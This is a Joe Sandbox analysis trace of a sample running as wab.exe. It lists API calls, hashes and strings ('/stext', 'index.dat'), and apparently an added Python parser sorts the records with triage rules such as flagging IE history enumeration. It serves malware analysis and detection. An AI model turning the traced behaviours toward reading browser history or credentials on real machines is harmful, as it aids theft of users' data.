                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                                                                                      • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: BINARY
                                                                                                                                                                                                                      • API String ID: 2221118986-907554435
                                                                                                                                                                                                                      • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

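An added helper for working with this section of the report; it is not part of the Joe Sandbox output. It parses function records in the layout above (API bullets with `ref:` addresses, `Part of subcall function` bullets, the Similarity key/value bullets and the `Uniqueness Score` line) into Python objects, then applies a few triage rules so that thousands of records can be sorted by behaviour instead of read one by one. The sample input is constructed from three of the records on this page with the hashes shortened; the triage rule set is this example's own assumption, not a Joe Sandbox signature.

```python
"""Parse Joe Sandbox execution-graph function records and triage them.

Added example for this report section. The record layout is the one shown on
the page; the triage rules below are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three records in the page's layout, hashes shortened.
SAMPLE = """\
APIs
• GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
• GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• String ID:
• API String ID: 1125800050-0
• Opcode ID: 18925d4506bf8546
• Instruction ID: b144c37017a21c6b
• Opcode Fuzzy Hash: 18925d4506bf8546
• Instruction Fuzzy Hash: ACE0927A500218A7
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileFindFirst
• String ID: *.*$index.dat
• API String ID: 1974802433-2863569691
• Opcode ID: da4ae6558bc3f7d8
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Similarity
• API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
• String ID:
• API String ID: 1161345128-0
Uniqueness

Uniqueness Score: -1.00%
"""

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR" (C++ decorated names allowed)
API_RE = re.compile(
    r"^(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<caller>[0-9A-Fa-f]{8}): (?P<rest>.+)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+ID|[A-Za-z ]+Hash|Source File|Snapshot File): ?(?P<val>.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score: (?P<score>-?\d+(?:\.\d+)?)%$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    caller: str = ""  # set when the call was reached through a subcall function


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # API ID, String ID, hashes, ...
    uniqueness: Optional[float] = None

    @property
    def api_names(self) -> set:
        return {c.name for c in self.calls}


def parse_records(text: str) -> list:
    """Split the text into records; a 'Uniqueness Score' line closes a record."""
    records, current = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        m = SCORE_RE.match(line)
        if m:
            current.uniqueness = float(m.group("score"))
            records.append(current)
            current = FunctionRecord()
            continue
        caller = ""
        m = SUBCALL_RE.match(line)
        if m:
            caller, line = m.group("caller"), m.group("rest")
        m = API_RE.match(line)
        if m:
            current.calls.append(ApiCall(m.group("name"), m.group("module"),
                                         m.group("args") or "", m.group("ref"), caller))
            continue
        m = KV_RE.match(line)
        if m and not caller:
            current.fields[m.group("key")] = m.group("val").strip()
        # Section labels (APIs, Strings, Similarity, ...) carry no data and are skipped.
    if current.calls or current.fields:  # keep a trailing record cut off before its score
        records.append(current)
    return records


# Triage rules (this example's assumption): API sets that together mark a behaviour,
# and strings from the String ID field ('$'-separated) worth a closer look.
API_RULES = [
    ("drops a temp file", {"GetTempPathW", "GetTempFileNameW"}),
    ("reads file timestamps", {"CreateFileW", "GetFileTime"}),
    ("user-facing error dialog", {"MessageBoxW"}),
]
STRING_RULES = [("enumerates IE history/cache (index.dat)", "index.dat")]


def triage(record: FunctionRecord) -> list:
    hits = [label for label, needed in API_RULES if needed <= record.api_names]
    strings = record.fields.get("String ID", "").split("$")
    hits += [label for label, needle in STRING_RULES if needle in strings]
    return hits


def summarize(records: list) -> list:
    """(API ID, call count, uniqueness, triage hits) per record, for sorting."""
    return [(r.fields.get("API ID", ""), len(r.calls), r.uniqueness, triage(r)) for r in records]


if __name__ == "__main__":
    for row in summarize(parse_records(SAMPLE)):
        print(row)
```

Subcall bullets are kept with their caller address so that a CreateFileW reached through a helper still counts toward a rule; records that end without a `Uniqueness Score` line (such as one cut off at a page boundary) are still returned.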
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
• String ID:
• API String ID: 1161345128-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
• String ID:
• API String ID: 159017214-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmpmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1065087418-0
                                                                                                                                                                                                                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406E09
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00406E5A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3700833809-0
                                                                                                                                                                                                                      • Opcode ID: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                                      • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                      • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                      • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1297977491-0
                                                                                                                                                                                                                      • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                      • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1481295809-0
                                                                                                                                                                                                                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3150196962-0
                                                                                                                                                                                                                      • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4232544981-0
                                                                                                                                                                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3859505661-0
                                                                                                                                                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
